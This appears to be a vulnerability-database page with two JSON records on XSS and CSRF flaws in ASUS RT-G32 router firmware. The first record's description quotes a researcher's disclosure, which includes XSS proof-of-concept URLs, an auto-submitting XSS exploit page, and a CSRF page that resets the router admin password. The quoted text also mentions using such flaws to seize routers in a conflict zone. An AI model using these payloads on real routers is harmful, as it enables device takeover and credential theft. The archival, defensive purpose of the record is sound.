I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).

Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0303",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "asus",
        "version": "2.0.2.6"
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "asus",
        "version": "2.0.3.2"
      },
      {
        "model": "rt-g32",
        "scope": null,
        "trust": 0.8,
        "vendor": "asustek computer",
        "version": null
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "asustek computer",
        "version": "2.0.2.6"
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "asustek computer",
        "version": "2.0.3.2"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "BID",
        "id": "73296"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:asus:rt-g32",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:asus:rt-g32_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MustLive",
    "sources": [
      {
        "db": "BID",
        "id": "73296"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2015-2681",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2015-2681",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-01955",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-80642",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-2681",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-2681",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-01955",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201503-426",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-80642",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. \nAn attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. \n\n----------\nDetails:\n----------\n\nCross-Site Scripting (WASC-08):\n\nhttp://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27\n\nhttp://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27\n\nThese vulnerabilities work as via GET, as via POST (work even without\nauthorization). \n\nASUS RT-G32 XSS-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 XSS exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"next_page\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"group_id\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"action_script\"\nvalue=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"flag\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nCross-Site Request Forgery (WASC-09):\n\nCSRF vulnerability allows to change different settings, including admin\u0027s\npassword. As I showed in this exploit (post-auth). \n\nASUS RT-G32 CSRF-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 CSRF exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"v_password2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"action_mode\" value=\"+Apply+\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nI found this and other routers since summer to take control over terrorists\nin Crimea, Donetsk \u0026 Lugansks regions of Ukraine. Read about it in the list\n(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)\nand in many my interviews\n(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). \n\nI mentioned about these vulnerabilities at my site\n(http://websecurity.com.ua/7644/). \n\nBest wishes \u0026 regards,\nMustLive\nAdministrator of Websecurity web site\nhttp://websecurity.com.ua \n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "BID",
        "id": "73296"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-2681",
        "trust": 3.4
      },
      {
        "db": "PACKETSTORM",
        "id": "130724",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "73296",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "db": "BID",
        "id": "73296"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "id": "VAR-201503-0303",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      }
    ],
    "trust": 1.12424244
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:44:25.751000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "RT-G32",
        "trust": 0.8,
        "url": "http://www.asus.com/Networking/RTG32/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://websecurity.com.ua/7644/"
      },
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html"
      },
      {
        "trust": 2.3,
        "url": "http://seclists.org/fulldisclosure/2015/mar/42"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/73296"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2681"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2681"
      },
      {
        "trust": 0.3,
        "url": "http://www.asus.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.asus.com/networking/rtg32/"
      },
      {
        "trust": 0.1,
        "url": "http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)"
      },
      {
        "trust": 0.1,
        "url": "http://websecurity.com.ua"
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://websecurity.com.ua/7644/)."
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html)."
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm\""
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "db": "BID",
        "id": "73296"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "db": "BID",
        "id": "73296"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "date": "2015-03-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "BID",
        "id": "73296"
      },
      {
        "date": "2015-03-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "date": "2015-03-07T11:11:11",
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "date": "2015-03-23T16:59:09.523000",
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "date": "2016-12-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-80642"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "BID",
        "id": "73296"
      },
      {
        "date": "2015-03-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-001914"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      },
      {
        "date": "2024-11-21T02:27:50.530000",
        "db": "NVD",
        "id": "CVE-2015-2681"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asus RT-G32 Router Cross-Site Scripting Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01955"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-426"
      }
    ],
    "trust": 0.6
  }
}

var-201504-0585
Vulnerability from variot

ASUS RT-G32 Router is a wireless router product from ASUS. Cross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in ASUS RT-G32 routers using firmware version 2.0.2.6 and 2.0.3.2. When a user browses an affected website, their browser executes arbitrary script code provided by the attacker. This could lead to attackers stealing cookie-based authentication and performing unauthorized operations. Other attacks may also be possible

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201504-0585",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asus",
        "version": "2.0.3.2"
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asus",
        "version": "2.0.2.6"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "74378"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MustLive",
    "sources": [
      {
        "db": "BID",
        "id": "74378"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ],
    "trust": 0.9
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ASUS RT-G32 Router is a wireless router product from ASUS. \nCross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in ASUS RT-G32 routers using firmware version 2.0.2.6 and 2.0.3.2. When a user browses an affected website, their browser executes arbitrary script code provided by the attacker. This could lead to attackers stealing cookie-based authentication and performing unauthorized operations. Other attacks may also be possible",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      },
      {
        "db": "BID",
        "id": "74378"
      }
    ],
    "trust": 0.81
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "74378",
        "trust": 0.9
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "74378"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ]
  },
  "id": "VAR-201504-0585",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.42424244
  },
  "last_update_date": "2022-05-17T01:47:57.658000Z",
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/74378"
      },
      {
        "trust": 0.3,
        "url": "http://www.asus.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.asus.com/networking/rtg32/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2015/apr/86"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "74378"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "74378"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-04-26T00:00:00",
        "db": "BID",
        "id": "74378"
      },
      {
        "date": "2015-04-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-04-26T00:00:00",
        "db": "BID",
        "id": "74378"
      },
      {
        "date": "2015-05-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ASUS RT-G32 Router Cross-Site Scripting Vulnerability and Cross-Site Request Forgery Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201505-354"
      }
    ],
    "trust": 0.6
  }
}